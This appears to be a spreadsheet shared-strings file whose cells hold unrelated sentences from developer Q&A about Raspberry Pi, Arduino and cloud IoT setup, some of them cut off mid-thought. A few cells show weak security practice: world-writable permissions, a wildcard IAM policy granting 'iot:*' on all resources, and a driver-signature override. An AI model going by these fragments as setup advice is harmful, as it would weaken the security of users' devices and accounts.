    <t>I have followed the instructions found on many sites for getting the Raspberry Pi to auto login (those all work), auto run startx, but I'm stuck on getting my program to run once the GUI loads.</t>
  </si>
  <si>
    <t>JV - Channel Verification
NW - Network Watchdog Timeout
I've read all instructions from datasheet, I've googled many times but I couldn't find any significant solution.</t>
  </si>
  <si>
    <t>Alter the permissions on  so that world has read and write priviliges (something you may not want to do) - although you may find they reset each time the device is plugged in eg:
02.</t>
  </si>
  <si>
    <t>make NDK_HOME=~/Android/android-arm-23/ ANDROID_API=23 DYNAMIC=1 TCP=1 SECURE=1 DEBUG=1
The build instructions are limited to building the C code that must be run using adb shell.</t>
  </si>
  <si>
    <t>You will probably also want to follow their instructions about locking while accessing the serial device (if multiple threads could potentially use it at the same time).</t>
  </si>
  <si>
    <t>Our project is detecting intrusion in an indoor system.</t>
  </si>
  <si>
    <t>I verify and upload successfully.</t>
  </si>
  <si>
    <t>Once the ip address and password along with api.thingspeak.com and write api are entered and saved the ESP8266 restarts and connects and starts to upload the two sensor readings to ThingSpeak.</t>
  </si>
  <si>
    <t>The below recorder works only the first time, if you tried recording a second time it gives the error 'kAudioFileInvalidPacketOffsetError' when trying to AudioFileWritePackets.</t>
  </si>
  <si>
    <t>We know there is an API to manually register device under the gateway .</t>
  </si>
  <si>
    <t>at this point, what is the difference between registering the UserSensor  with the UserDriverManager (done), and registering it with the SensorManager?</t>
  </si>
  <si>
    <t>Do we need to register the device after enrolling in Group enrollment?</t>
  </si>
  <si>
    <t>Sensor 2 = If Gas leakage is detected, flash BLUE LED and Play Buzzer tone.</t>
  </si>
  <si>
    <t>vlc rtsp://10.146.0.57:8554/test
If I reboot the Pi, the video feed on the VLC will be corrupted.</t>
  </si>
  <si>
    <t>as stupid it might seem, the thing that was unclear to me until then, is that flashing the bootloader and the firmware separately does not work.</t>
  </si>
  <si>
    <t>Essentially I read all RSSI from all beacons installed in a certain "venue".</t>
  </si>
  <si>
    <t>As Marcel Str pointed out, it was indeed an issue during the flashing of the firmware.</t>
  </si>
  <si>
    <t>If you don't have register value, you have to Read &amp; Modify &amp; Write it back.</t>
  </si>
  <si>
    <t>This will require mutex protection so only one thread can read/write it at a time.</t>
  </si>
  <si>
    <t>You can download the image file by:
Go to Android Things console and login.</t>
  </si>
  <si>
    <t>The API doesn't allow it and it also exposes your API key to anyone who inspects your code from the browser.</t>
  </si>
  <si>
    <t>This gives the file all available permissions(read, write, execute).</t>
  </si>
  <si>
    <t>There is an instruction to jump into privileged mode (more than one, actually) but of course you jump to an entry point in the kernel.</t>
  </si>
  <si>
    <t>If still relevant to anyone...
use Credentials *credentials.Credentials in aws.Config
see docs at:
https://godoc.org/github.com/aws/aws-sdk-go/aws#Config</t>
  </si>
  <si>
    <t>Pat Brenner wrote large portions of Spy++.</t>
  </si>
  <si>
    <t>Videos that are considered to contain potentially offensive content are available only to registered users 18 and older.</t>
  </si>
  <si>
    <t>Our focus is that you have better things to do with your time than worry about data access.</t>
  </si>
  <si>
    <t>The below c# code I am using to enroll the device
The above code successfully enrolls the device to the DPS but status shows as unassigned
Issue#1 - Enrollment status unassigned, sometimes shows FAILED
Status: failed
Error code: 404201
Issue#2
Once above issue resolved, then I would like to have some configuration where I can specify which device should map to which IoT, so that device can automatically decide it's target IoT hubs.</t>
  </si>
  <si>
    <t>Reading the temperature requires connecting to the beacon to use its Bluetooth services and characteristics, but Estimote Beacons have a security mechanism in place which'll prevent you from doing so outside of the official SDKs.</t>
  </si>
  <si>
    <t>But, when you try to read or write data to/from the peripheral device for the first time, that's when the security requirements of the GATT service are verified and pairing request is generated and pairing takes place.</t>
  </si>
  <si>
    <t>What we want to do next is, after about 30 seconds of motion being detected, sending out an email alert, seeing that we don't have Ethernet capability at this point, we figured the easiest way would be to grab the emailing through Python.</t>
  </si>
  <si>
    <t>regarding your statement: I grounded the /WC pin so it's not write protected
given EEPROM SPEC SHEET figure 8, the /WC MUST be high during the writing to the EEPROM.</t>
  </si>
  <si>
    <t>lirc_rpi: to_irq 178
lirc_rpi: auto-detected active low receiver on GPIO pin 18
lirc_rpi lirc_rpi: lirc_dev: driver lirc_rpi registered at minor = 0
lirc_rpi: driver registered!</t>
  </si>
  <si>
    <t>Simplified I have 2 tables:
UserTable
UserID (collected from NFC reading on the device at first time use)
Name (written by user on the touchscreen)
E-mail
MagicTable
UserID (collected from NFC reading on the device when user scans his
card)
Data 1
Data 2
MagicTable will be subject for analysis and some AI/prediction.</t>
  </si>
  <si>
    <t>Updating or flashing the Intel firmware will have you unable to use Windows, so you are stuck like all of us with a linux galileo.</t>
  </si>
  <si>
    <t>Another option would be to build into your custom system a service/daemon that is able to provide file handles to apps based on Android permissions or some other set of rules (side note, this is essentially how the Peripheral I/O works in Android Things).</t>
  </si>
  <si>
    <t>When I put my .jar file on the raspberry, it compiles (writes out my System.out.println) but sends me a java.net.SocketException exception :
I tried to run my .jar using sudo, tried without firewall (iptables), with an Ethernet connection and on different Wi-Fi access points and even on different Raspberry.</t>
  </si>
  <si>
    <t>To make your posted code work you probably have to take Internet permission in manifest
http://developer.android.com/reference/android/Manifest.permission.html#INTERNET
Additionally, if you need do it only on wifi check for wifi first (and request appropriate permission in manifest)</t>
  </si>
  <si>
    <t>Apple's OS app sandbox prevents generic (Classic non-BLE) Bluetooth serial data comm on stock OS devices, except for a few companies registered in their MFi program.</t>
  </si>
  <si>
    <t>I am working on a raspberry pi and am having a tough time giving permissions to an external hard drive that I have mounted using the following tutorial:
http://www.howtogeek.com/139433/how-to-turn-a-raspberry-pi-into-a-low-power-network-storage-device/
I have now created folders on that external hard drive and when I do a  command I get the following returned:
That is located in: /media/USBHDD1/shares
Now I'm trying to give it all write read and execute permissions or even change the owner and group to pi:pi
However, chmod 777 is not working  it doesn't return an error, just seems to have no effect
And when I use 
sudo chown -R pi:pi test/
I get the error
chown: changing ownership of `test/': Operation not permitted
This is a linux question but I think someone with background and knowledge of using a raspberry pi can help me out here.</t>
  </si>
  <si>
    <t>On the desktop, inputs can be triggered, however, on the Raspberry Pi, I can verify that the GPIO subsystem has registered the input, but the uinput events do not trigger.</t>
  </si>
  <si>
    <t>Here are some of the things I've tried:
Make Sure MySQL is running and root user has permission
Change bind-address in mysql config file
Because Raspbian Stretch uses mariadb, I found this option in a different file than most solutions showed.</t>
  </si>
  <si>
    <t>My understanding is:
 is like a MAC address
AppKey is like a public key (roughly...)
AppEUI is like a port number
Now I'm having problem understanding who is responsible for creating these IDs:
DevEUI can be generated from the LoRa chip internal ID registers (I'm using Murata's type ABZ chip)
AppKey: should it be unique for each end node?</t>
  </si>
  <si>
    <t>For the time being, when your app requests dangerous permissions (like location permissions), you need to reboot the device after install (one-time) to have those permissions granted during boot.</t>
  </si>
  <si>
    <t>I have installed the last version of raspbian on my raspberry pi, and I have opened an account AWS IoT on Amazon, then in the IoT web interface I have created a thing, with "RaspberryPi_2" name and create certificate and connect the certificate to the thing, I have followed this guide:
http://blog.getflint.io/blog/get-started-with-aws-iot-and-raspberry-pi
I have then created the script in the guide, to connect and subscribed the raspberry pi, this is my code:
but when I do this command:
or this command:
python mqtt_test.py
and press enter, and the cursor flash and doesn't print anything and stay stuck there, someone can help me?</t>
  </si>
  <si>
    <t>Found chip PN532
Firmware ver.</t>
  </si>
  <si>
    <t>If you have a WiFi Dongle for the PI, you also can be unplugged from the Ethernet Cable.</t>
  </si>
  <si>
    <t>I am building electronic toll colection system using arduino which rfid based;i want to send the "unique id" of the tag(read by arduino) to php script(stored on local apache server root folder).i have written the code please point out the mistakes and also have a look on the ethernet settings whether they are correct in the program..</t>
  </si>
  <si>
    <t>When I am trying to run the following node.js example from AWS IoT I get this error(following this tutorial):
However I have the private.pem.key in  folder as requested by the tutorial.</t>
  </si>
  <si>
    <t>I am able to complete the first step which uses the code in get-credentials.py to connect to Google with my application client-id and secret.</t>
  </si>
  <si>
    <t>I am getting following error at the last step , when I am enrolling my device using ios agent app.</t>
  </si>
  <si>
    <t>In the example there is only showed how to use WiFiClientSecure with manually written request.</t>
  </si>
  <si>
    <t>I hope, you have not eliminated or modified any portions of your credentials.</t>
  </si>
  <si>
    <t>Also later:
verify your USB cable by connecting a known-working device with it.</t>
  </si>
  <si>
    <t>If the device reboots or ethernet is unplugged, you'll have to run this procedure again.</t>
  </si>
  <si>
    <t>The first step will be to plug in an ethernet cable and connect that way.</t>
  </si>
  <si>
    <t>I don't fully understand how do you intend to access the GPU without using Linux, and I am not that familiar with the technicalities, but some time ago I've been digging into the GPU for my private project so I'll tell you what I know.</t>
  </si>
  <si>
    <t>'gateway' should be whatever the gateway value in windows was (assuming these machines are on the same network)
[Ctrl]+[x], Save changes
reboot via
sudo reboot
once the system has rebooted
ifconfig eth0
should list the new settings.</t>
  </si>
  <si>
    <t>Bluetooth LE requires to devices to be bonded (paired) before they can successfully encrypt transmissions used to read/write a given characteristic.</t>
  </si>
  <si>
    <t>I have the shield connected via an Ethernet cable to my home router.</t>
  </si>
  <si>
    <t>To enable this feature (datasheet pg 57):
It looks like I need to write something like 00011111 to register 0x01 on the chip.</t>
  </si>
  <si>
    <t>Now, when I verify the code in the arduino IDE, i get the following set of errors:
I would appreciate it very much if somebody would tell me:
1) what these errors mean.</t>
  </si>
  <si>
    <t>All wiring has been checked 10 times and verified correct.</t>
  </si>
  <si>
    <t>I work on raspberry pi via SSH session, model B raspbian 
I want the  python script to run as soon as I plug in the power supply to my raspberry pi without connecting the ethernet cable.</t>
  </si>
  <si>
    <t>This is for my Ethical Hacking and Countermeasures class; I am doing a project using a raspberry pi running Kali Linux, but the distro I downloaded does not have ettercap installed.</t>
  </si>
  <si>
    <t>Avrdude said the flash was uploaded and verified, but the led did not blink.</t>
  </si>
  <si>
    <t>I followed these steps to get the Host Light example device registered on Weave and running on a Raspberry Pi 3.</t>
  </si>
  <si>
    <t>Password is "abc$123" for ldap user it was successfully set using ldappasswd but when login with this password it's give error of Invalid Credential.</t>
  </si>
  <si>
    <t>Is it possible register device (obtain credential) from client side?</t>
  </si>
  <si>
    <t>I need a shell script that checks if the Raspberry was incorrectly shutdown and, if it was, to be rebooted using sudo reboot.</t>
  </si>
  <si>
    <t>I'm trying to get details of the registered things and create new things.</t>
  </si>
  <si>
    <t>We can verify that this application installs/runs without issue on an Intel Edison board running Android Things 4.1.</t>
  </si>
  <si>
    <t>I have read several tutorials and topics and I did everything as described, but still I am not able to register device.</t>
  </si>
  <si>
    <t>I want to use YOLO for person detection in real time on Raspberry Pi.</t>
  </si>
  <si>
    <t>Then I check if devoce0 is registered:
and it returns video0 so it is registered.</t>
  </si>
  <si>
    <t>Connected to internet using  ethernet where  the android things board is behind the proxy.</t>
  </si>
  <si>
    <t>Not sure why its doing this as i have used ssh on other things like servers and the file system updates in real time.</t>
  </si>
  <si>
    <t>Now, I also want to be able to enroll COPE-devices, so I can use operations such as upgrading firmware and factory resetting a device.</t>
  </si>
  <si>
    <t>I would expect android of things to be able to advertise or at least act as a beacon.</t>
  </si>
  <si>
    <t>The wiring was verified by using this python script:
https://www.raspberrypi-spy.co.uk/2012/08/20x4-lcd-module-control-using-python/#prettyPhoto
The output is correct.</t>
  </si>
  <si>
    <t>I've then got to complete the OAuth flow on Android Things but that's where I'm having an issue.</t>
  </si>
  <si>
    <t>when I try to verify the code, the IDE tells me that it fails to compile the  board program.</t>
  </si>
  <si>
    <t>EDIT: You can use this fuse bit calculator to verify fuse settings.</t>
  </si>
  <si>
    <t>(I don't particularly recommend running stuff you download without auditing it first, nor have I tried these instructions.)</t>
  </si>
  <si>
    <t>If this problem occurs again, consider upgrading Wifi Shield Firmware .</t>
  </si>
  <si>
    <t>Only if a lot of times in a row no card has been detected, it will read again.</t>
  </si>
  <si>
    <t>You don't need to write anything to the chip in order detect its type.</t>
  </si>
  <si>
    <t>Before flashing a new firmware, make sure your chip is fully erased.</t>
  </si>
  <si>
    <t>That makes detecting Things name quite challenging unless you adopted approach one certificate per Thing.</t>
  </si>
  <si>
    <t>Use the -verify option to instead have it verify a signed JAR file.</t>
  </si>
  <si>
    <t>This redirection is transparent to applications reading from or writing to the registry.</t>
  </si>
  <si>
    <t>{
    "require":{
        "opauth/opauth": "*",
        "opauth/facebook": "*",
        "opauth/google": "*",
        "opauth/twitter": "*"
    }
}
Run php composer.phar install
Manual download
Download Opauth (ZIP) and unzip it.</t>
  </si>
  <si>
    <t>I've followed the tutorial steps for adding a new device (registered device type, added device, set up connectivity parameters on the device side, etc.</t>
  </si>
  <si>
    <t>I've spent two nights trying to upload firmware so I'll just repeat what helped me since there's not so many solutions:
First in Serial Monitor make sure that your chip responses to AT commands.</t>
  </si>
  <si>
    <t>As noted in the Platform Overview, runtime permissions granting is not supported on Android Things because the device may not have an interactive display to show the dialog.</t>
  </si>
  <si>
    <t>CHDK is the free software Canon Hack Development Kit project, started by Andrey Gratchev, has successfully enhanced many Canon PowerShot cameras without replacing the stock firmware.</t>
  </si>
  <si>
    <t>I know I could put a suitable Android or Apple device and accomplish it that way, but I don't see why this dongle can't detect these iBeacons and tell me what their UUID's are?</t>
  </si>
  <si>
    <t>How can I verify the touch screen input device was successfully loaded?</t>
  </si>
  <si>
    <t>That said, it is possible to detect iBeacons with a Raspberry Pi using a variation of what @ChrisStratton suggests in his comment.</t>
  </si>
  <si>
    <t>Even if they allowed port 80 you should not use that; you'd be transmitting your credentials or API token unencrypted, which is dangerous.</t>
  </si>
  <si>
    <t>Can I mount the SD card and then load the complete OS to memory and then run from there so that I am only worried to write down the data in sd card data partition but if it is not safely shutdown, my SD card root filesystem is not going to get corrupted ?</t>
  </si>
  <si>
    <t>I want to have the state of the checkbox saved on the server end so that when the page is loaded it shows weather the GPIO is on or off, I don't want to use cookies or local storage because that only effects a single browser on a single device.</t>
  </si>
  <si>
    <t>Is there any chance the library is doing something during the "client.connect" which causes the exception:
Exception Causes (EXCCAUSE) EXCCAUSE Code Cause Name  Cause
  Description   Required Option EXCVADDR Loaded
0 IllegalInstructionCause Illegal instruction Exception   No
I dont expect to review the whole library, but maybe some guidance on why this might be happening.</t>
  </si>
  <si>
    <t>It will load the required shared libraries into the process address space and set the appropriate permissions on the memory (read only, read write and executable).</t>
  </si>
  <si>
    <t>Reading a file that is corrupt in some way, or cannot be read properly from the file system
When reading from a stream, you should be able to detect and handle this exception, as well as other stream-related exceptions such as timeouts.</t>
  </si>
  <si>
    <t>Secondly, it provides your visitors with real-time validation information as they fill out forms, helping them to get it right first time, making the forms easier, quicker and less daunting to complete.</t>
  </si>
  <si>
    <t>I tried installing it with the following command:
And the following log is shown:
When I open the /var/log/syslog file, it shows the following lines:
No subnet declaration for th0 (x.x.x.x)
** Ignoring requests on eth0.</t>
  </si>
  <si>
    <t>Once you've registered an application, make sure
to set your application's Access Level to "Read, Write and Access direct
messages", otherwise you'll receive an error that looks like this:
Error processing your OAuth request: Read-only application cannot POST
A mobile phone number must be associated with your account in order to obtain write privileges.</t>
  </si>
  <si>
    <t>Edit: reading through the Cortex M0+ Technical Reference Manual and ARMv6 Manual I've found a register called DHCSR which allows the debugger to mask interrupts, but I can't work out how to access these registers.</t>
  </si>
  <si>
    <t>Technically the NFC chip in the Nexus is capable to do this, but the public Android API does not expose this feature and it is not trivial to enable/implement this.</t>
  </si>
  <si>
    <t>So I would have to register each cooling system in the building as a device and the computer connected to the IoT hub would need to manage the credentials for each device (cooling system) and send their data using the correct credentials.</t>
  </si>
  <si>
    <t>I've already declared required permission as follow in manifest,
And try to request permission at run-time, AT shows windows regarding permission setup.</t>
  </si>
  <si>
    <t>Now I want to develop a mobile or web application to let an authorized user read inputs status and read/write outputs.</t>
  </si>
  <si>
    <t>The ordinary Arduino IDE already does that for you when you click on the button verify &amp; upload, so you simply have to take the generated .hex file and give it away.</t>
  </si>
  <si>
    <t>These are privileged instructions, which can only be used from a kernel-mode driver (Ring 0), or a userspace process which has been given I/O privileges.</t>
  </si>
  <si>
    <t>Integrate Smart Lock for Passwords into your app by using the Credentials API to retrieve saved credentials on sign-in.</t>
  </si>
  <si>
    <t>Sometimes the PC could also not detect that the board was connected it
  would not show up in the Device Manager.</t>
  </si>
  <si>
    <t>So we need to save the appropriate credential so the get credential function can work.</t>
  </si>
  <si>
    <t>The Documentation for Cloud IoT provides some steps that you should verify first, but since you connected from the NodeJS code, we can discard some suggestions.</t>
  </si>
  <si>
    <t>Option 1 looks correct, as it mentions here: https://cloud.google.com/iot/docs/how-tos/credentials/keys.</t>
  </si>
  <si>
    <t>Bluetooth shields are another option, as an alternative to the ADK USB host interface which the board you have selected already provides, so you don't need a bluetooth shield unless you wish to have a wireless connection, or use a very old Android device which predates the ADK interface availability.</t>
  </si>
  <si>
    <t>You can disable File and Registry Redirection by adding an assembly manifest that includes the runas invoker section:
Arduino.exe.manifest:
and place  in the same folder as arduino.exe.</t>
  </si>
  <si>
    <t>After looking into this I decided to use a SSH connection and then play a video from a link using OMXPlayer.</t>
  </si>
  <si>
    <t>However, it will give you a modicum of security (and a tiny bit of security through obscurity, if you believe in this sort of a thing).</t>
  </si>
  <si>
    <t>Finally, disposing the SerialPort will makes sure it is registered by Windows in  HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\SERIALCOMM, meaning that SerialPort.GetPortNames() can re-detect the port.</t>
  </si>
  <si>
    <t>You have to get the authenticateBlock() to succeed because the card will not read or write without that step.</t>
  </si>
  <si>
    <t>As Nick and proppy noted, one step is to obtain authorization code to be used in later steps.</t>
  </si>
  <si>
    <t>The steps that I took are as follows:
To become root on a Linux system, in a terminal, issue the command
and give your login password when asked.</t>
  </si>
  <si>
    <t>The tutorial link:
https://hub.packtpub.com/build-google-cloud-iot-application/#comment-53421
This is the top part of my index.js file:
The tutorial doesn't say anything about downloading the Google root CA certificate so I followed this tutorial:
https://raspberrypi.stackexchange.com/questions/76419/entrusted-certificates-installation
I also checked the connection route was OK by following this at Google and everything checked OK:
https://cloud.google.com/iot/docs/troubleshooting
The projectID, registryID, deviceID, and region all checked correct.</t>
  </si>
  <si>
    <t>so here is the problem
i have arduino yun like this one but, the Ethernet and Wireless AP is dead, my senior say that this arduino yun firmware experimented by unknown people, so i'm trying to surf the web and found out how to flash but they said it need to connected via Ethernet which you know that thing is dead.</t>
  </si>
  <si>
    <t>It provides additional x86 assembly instructions and instruction prefixes for activating/deactivating a transactional access to memory and avoid hardware locking if possible.</t>
  </si>
  <si>
    <t>For example, these are the HTML attributes for the username upon loading the page for the first time:
But when I refresh the page, this same bit of HTML code changes to:
&lt;input name="ct100$phUser$txtUser5516" type"text" id="txtUser5516"
class="login_user border-box" placeholder="My Username"&gt;
I would love to pass the URL arguments in the form of:
dologin.action?ct100$phUser$txtUserXxXx=CapnCrunch
Where XxXx is just whatever number the page decided to use at that time.</t>
  </si>
  <si>
    <t>The data source I want to feed it is being logged real time into an SQL Server database.</t>
  </si>
  <si>
    <t>Is there a way for a raspberry-pi to comunicate (read/write) to an android device through usb cable and gpio connector, not necessarily usb protocol but with an Api and without root right.</t>
  </si>
  <si>
    <t>I have written a program in Arduino to detect intrusion using an ultrasonic sensor.</t>
  </si>
  <si>
    <t>I followed this instructions:
(see docs)
and this video:
(See Video)
How to make javaFX app window appear over SSH in terminal like?</t>
  </si>
  <si>
    <t>* Can Successfully ping &amp; SSH with the raspberry pi, even run the program mentioned in the previous point through the SSH and it works fine.</t>
  </si>
  <si>
    <t>I want to run a demo of this happening in class - first with no security, and then a few other times - each time adding another layer of security.</t>
  </si>
  <si>
    <t>I am running a RaspberryPi with raspbian-wheezy:
How i want to use a NetGear N150 Wireless USB stick as a wlan interface:
The device is not automatically detected.</t>
  </si>
  <si>
    <t>I am writing arduino sketch that will do certian things when certian characters are given through serial port!</t>
  </si>
  <si>
    <t>While updating the thing shadow using these credentials always return 403 Forbidden Exception.</t>
  </si>
  <si>
    <t>Is there a a non blocking way of capturing user keystroke events in real time one key at a time?</t>
  </si>
  <si>
    <t>Currently I have configured port forwarding manually in my router settings.</t>
  </si>
  <si>
    <t>But all configuration examples i've found for pi bridging ethernet and wifi so the pi itself cannot access the ethernet anymore.</t>
  </si>
  <si>
    <t>I have a raspi3 with android things on it and I want to connect to a BLE device that requires a user authentication for bounding.</t>
  </si>
  <si>
    <t>I want to reset this sleep time when  the intruder is detected during sleep time.</t>
  </si>
  <si>
    <t>Although ADK was backported to Android 2.3.4, many vendors did not include the necessary kernel modifications with the firmware.</t>
  </si>
  <si>
    <t>I have a sketch that detects chip signatures including taking an MD5 sum of the bootloader.</t>
  </si>
  <si>
    <t>The I2C chip at 0x21 is still not detected, though the driver says it supports up to 8 chips 
I can see two possible causes to this issue.</t>
  </si>
  <si>
    <t>It is also detecting another BLE beacon (my AppleTV downstairs) with UUID of B9782E08068C with signal strength of -071.</t>
  </si>
  <si>
    <t>Recent Android version provides API for enumerating USB devices.</t>
  </si>
  <si>
    <t>What solved my problem was re-flashing the microSD card and trying to connect again but this time with correct SSID/Password for the first time.</t>
  </si>
  <si>
    <t>I suspect you are having trouble scanning for BLE devices on the Raspberry Pi 3 using Nearby.</t>
  </si>
  <si>
    <t>For authenticated user (Here Facebook) few things have to be added both on AWS side and Android Side
Android
The above code is necessary as it is used by  for authentication of the user for publishing and connecting to the thing.</t>
  </si>
  <si>
    <t>This code will detect the ethernet cable being detached and a change in the public IP address.</t>
  </si>
  <si>
    <t>Please verify the correct remote authentication mode
  is specified in the project debug settings.</t>
  </si>
  <si>
    <t>For example, to manually register a Sample.ocx ActiveX control, type the following command at the command prompt:  
c:\regsvr32.exe sample.ocx
For more information, see How to Register a DLL</t>
  </si>
  <si>
    <t>Here are some of the things you can do with the Google Webmaster Tools API:
Request a list of all your verified sites.</t>
  </si>
  <si>
    <t>More info
Android official guide - Working with permissions
Android official guide on Declaring Permissions</t>
  </si>
  <si>
    <t>Selenium Server reads the client instruction and contacts the app server.</t>
  </si>
  <si>
    <t>*/
private static Credential authorize() throws Exception {
// load client secrets
GoogleClientSecrets clientSecrets = GoogleClientSecrets.load(JSON_FACTORY,
    new InputStreamReader(CalendarSample.class.getResourceAsStream("/client_secrets.json")));
// set up authorization code flow
GoogleAuthorizationCodeFlow flow = new GoogleAuthorizationCodeFlow.Builder(
    httpTransport, JSON_FACTORY, clientSecrets,
    Collections.singleton(CalendarScopes.CALENDAR)).setDataStoreFactory(dataStoreFactory)
    .build();
// authorize
return new AuthorizationCodeInstalledApp(flow, new LocalServerReceiver()).authorize("user");
}
The library makes batching and media upload/download easier.</t>
  </si>
  <si>
    <t>I have an universal windows app which is deployed to Raspberry PI 3 with windows iOT Core,  the PI 3 can have many sensors connected, therefore those sensors need to be registered with Azure IOT Hub, in order to do that I register them manually with Device Explorer, and then on an XML file I created, I put the Device Key and other configuration settings.</t>
  </si>
  <si>
    <t>*
My code:
If possible, I'm looking for the most optimal write and read rates without data corruption handling at this point.</t>
  </si>
  <si>
    <t>You have to verify the install per the Raspberry OS install instructions before attempting to boot with it.</t>
  </si>
  <si>
    <t>You can define your application to have access to a specific thing in AWS IoT or you can define it to access all things in AWS IoT service (using IAM, Cognito or Temporary Security Credentials).</t>
  </si>
  <si>
    <t>When I try char-write-req 0x0024 0100 I get Error: Characteristic write Request failed: Attribute requires authentication before read/write
So I try sec-level medium and then sec-level high but I still get the same error.</t>
  </si>
  <si>
    <t>I need that in order to register the device (Esp32) https://organization_ID.internetofthings.ibmcloud.com/dashboard/#/overview
I have a LITE account for Internet of Things Platform Starter
Edit:
When login in internetofthings.ibmcloud.com I see no organization registered:
 when I click in Register, it takes me to the Bluemix panel.. nothing else.</t>
  </si>
  <si>
    <t>Assuming you don't need to store integer values &gt; 254 ( in which case you'd have to write two bytes for each element in secretCode ), this would be:
Having written them, you would read them back on start-up using the read function in the setup.</t>
  </si>
  <si>
    <t>First of all, a word of warning: These registers are likely used by the Operating System, so if you fiddle with them, chances are that you break something...
That said, there are two options:
The proper one: write a kernel driver and you'll have plenty of functions to access the hardware in a sane and controlled way.</t>
  </si>
  <si>
    <t>The Zephy-rtos project is a scalable real-time operating system (RTOS) supporting multiple hardware architectures, optimized for resource constrained devices, and built with security in mind.</t>
  </si>
  <si>
    <t>Be advise that this option makes it harder to upload new firmware since the bootloader uses the reset to start.</t>
  </si>
  <si>
    <t>Instead of arduino built-in boot loader just go through below link and it will be great for uploading boot loader and verifying board status info
I am replying you this because same issue I got long back and it saved me.</t>
  </si>
  <si>
    <t>Librato is a cloud platform for real-time operations analytics that accepts metrics from any source for real-time aggregation and transformation, anomaly detection, alerting, visual analysis and storage.</t>
  </si>
  <si>
    <t>For x509, registration id auto from the subject name of the certificate(CN) when you upload a leaf certificate and add an individual enrollment successfully.</t>
  </si>
  <si>
    <t>So recently I got myself a raspberry pi and I have been learning python and what not and I want to create a user from a text file but on the raspberry pi it's different with the raspberry pi you need to provide more than just a password and a user group you need all of this stuff 
How would I be able to do all of this from a text file, I am completely new to Linux scripting and that kind of stuff so I haven't really tried much other than the stuff that I have seen online but none of it works because the "raspbian" OS is a little different then most but here's just the script that i'm working with 
I know it's nothing but that will make the account so I don't need a password and then it takes me to the part where I need to put in the stuff above, if this is possible can you guys help me?</t>
  </si>
  <si>
    <t>The following is my aws credentials in ~/.aws/credentials
[default]
aws_access_key_id = YOUR_ACCESS_KEY_ID
aws_secret_access_key = YOUR_SECRET_ACCESS_KEY
and Policy attached into your identities:
{
"Version": "2012-10-17",
"Statement": [
    {
        "Effect": "Allow",
        "Action": [
            "iot:*"
        ],
        "Resource": "*"
   }
]
}
I also tried with Node.JS it works!!</t>
  </si>
  <si>
    <t>"Nothing happens" and "tried to execute from a bogus address" are often the result of either:
misconfigured kernel (is this kernel definitely intended to boot on the raspi2 board, and not on something else?)</t>
  </si>
  <si>
    <t>The TPM chip is detected and the /dev/tpm0 device shows up in linux.</t>
  </si>
  <si>
    <t>Their software is used by customers, including companies, schools and libraries, to protect their networks from spyware, prevent students from viewing sexual or other inappropriate content, discourage employees from spending time browsing webpages instead of working, and similar purposes.</t>
  </si>
  <si>
    <t>I'd like to know if it's really possible to use TPM module in RaspberryPi to automatically validate boot partition integrity and get the key to decrypt root partition using TPM chip.</t>
  </si>
  <si>
    <t>I was given credentials by a coworker, but upon further inspection of the sip endpoint, I found that the DiD number purchased for the account wasn't associated with the subaccount my coworker created for me.</t>
  </si>
  <si>
    <t>For the SSl Certificate i have followed the instructions from the arch owncloud documentation.</t>
  </si>
  <si>
    <t>And instead of uploading certification manually i want to be able upload it via code.</t>
  </si>
  <si>
    <t>In short, you have to connect it to network using Ethernet and then follow the instructions using adb command to connect it to Wifi.</t>
  </si>
  <si>
    <t>So if you want to upload your code with usb cable, you do not need to care about it.</t>
  </si>
  <si>
    <t>You probably also want to ensure that the IP address given to your raspberry pi by your router doesn't change or you will have to change the port forwarding settings every time that happens.</t>
  </si>
  <si>
    <t>So I decided to use this: 
When I insert the correct username and password, It works in my browser, It shows me the picture of the webcam stream.</t>
  </si>
  <si>
    <t>The code I'm trying is as follows:
The 'client' is verified to have been connected earlier in the code.</t>
  </si>
  <si>
    <t>Whatever credentials of account I have given its showing login incorrect.</t>
  </si>
  <si>
    <t>That would give you read/write/execute permissions to the GPIO files.</t>
  </si>
  <si>
    <t>So, the easiest way for your case is to do as I mentioned, you do the XHR, if the file successfully loads, then you have network access, else you don't.</t>
  </si>
  <si>
    <t>The other way is to obtain an internal IoT Hub access to the events default endpoint from your IoT Central application access token like is shown here.</t>
  </si>
  <si>
    <t>Looking at the stock Ethernet library, it's not possible to prevent it from blocking.</t>
  </si>
  <si>
    <t>I have also added a SSH key to github and added it on the raspberry pi following this (and the linked) tutorials for machine users:
https://developer.github.com/v3/guides/managing-deploy-keys/
Afterwards, I ran 
ssh -T git@github.com
which was successfully.</t>
  </si>
  <si>
    <t>It gives me error as under:
com.amazonaws.AmazonServiceException: User:
  arn:aws:sts::964546574005:assumed-role/Cognito_GTekPool3Unauth_Role/CognitoIdentityCredentials
  is not authorized to perform:
iot:CreateKeysAndCertificate on resource: * (Service: AWSIot; Status
  Code: 403; Error Code: AccessDeniedException; Request ID:
  b1c4acdd-b1ba-11e8-9d83-772e33c0d6b2)
Below is what I have done in code: 
Certificate from keystore is not reading and giving me IOexception.</t>
  </si>
  <si>
    <t>This works like a charm but every now and then the pc running node, decides to deactivate the usb ports due to EMI.</t>
  </si>
  <si>
    <t>I write a program on , to show the number of serial port in DropDownMenu list for Intel chip.</t>
  </si>
  <si>
    <t>All of the tutorials I have followed so far have you generate the private keys and certificates from the IoT Console, and place them into your device.</t>
  </si>
  <si>
    <t>This code to read the execution time of a single line of code:
This shows 0 microsec.</t>
  </si>
  <si>
    <t>If I comment out the SSID write/read portion the password will work.</t>
  </si>
  <si>
    <t>I tried , however it will allways tell me that it expected another device signature and fails when it tries to verify the code on the board after uploading it.</t>
  </si>
  <si>
    <t>For individual device enrollment it succedded, but when I try to register devices through enrollment groups it fails.</t>
  </si>
  <si>
    <t>My Analysis
My first thoughts were, there must be a bypass anywhere between 5V input and the analog read Pin, but i cannot detect any (checked by multimeter).</t>
  </si>
  <si>
    <t>So as I downloaded the Driver Signature Enforcement Overrider, I followed the instructions on /vista64/Readme64.txt.</t>
  </si>
  <si>
    <t>the web interface verify and write the input in a sqlite3.</t>
  </si>
  <si>
    <t>Keep an eye on the byte usage shown in the Arduino IDE when you verify your code.</t>
  </si>
  <si>
    <t>Hint: you can tick "Do not write" option to be sure that you will not accidentaly override the contents of your chip's memory.</t>
  </si>
  <si>
    <t>Looking at this issue it looks like option 2 is most likely as it implies you have to verify the cert yourself after the connection.</t>
  </si>
  <si>
    <t>It includes audit settings, account settings, user rights, security options, etc.</t>
  </si>
  <si>
    <t>This code outputs:
I know that my USBs are detected in Linux since the system log outputs: 
